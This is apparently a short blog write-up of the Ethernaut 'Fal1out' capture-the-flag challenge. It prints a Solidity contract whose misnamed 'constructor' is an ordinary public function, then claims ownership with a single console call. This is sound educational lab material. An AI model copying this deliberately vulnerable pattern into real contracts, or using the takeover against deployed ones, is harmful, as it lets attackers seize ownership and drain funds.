manbolq
Sunday, April 19, 2026 | 1 minute
Fal1out - The Ethernaut - writeup
The goal of this challenge is to claim ownership of the contract. This is its code:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "openzeppelin-contracts-06/math/SafeMath.sol";
contract Fallout {
using SafeMath for uint256;
mapping(address => uint256) allocations;
address payable public owner;
/* constructor */
function Fal1out() public payable {
owner = msg.sender;
allocations[owner] = msg.value;
}
modifier onlyOwner() {
require(msg.sender == owner, "caller is not the owner");
_;
}
function allocate() public payable {
allocations[msg.sender] = allocations[msg.sender].add(msg.value);
}
function sendAllocation(address payable allocator) public {
require(allocations[allocator] > 0);
allocator.transfer(allocations[allocator]);
}
function collectAllocations() public onlyOwner {
msg.sender.transfer(address(this).balance);
}
function allocatorBalance(address allocator) public view returns (uint256) {
return allocations[allocator];
}
}
Interacting with the contract is quite easy when solving The Ethernaut challenges:
-
After connecting our Metamask wallet, click on “Get New Instance”:
-
After approving the transaction, the contract address will be shown in the browser’s javascript console:
This challenge is a piece of cake! Even though the Fal1out function has a comment saying it is a “constructor”, it is not. There is no constructor keyword and therefore, it is a standard function that can be called and the ownership will be changed.
It is enough to execute this line in the javascript console:
await contract.Fal1out()
Now, click on “Submit Instance” to verify that the challenge was solved:
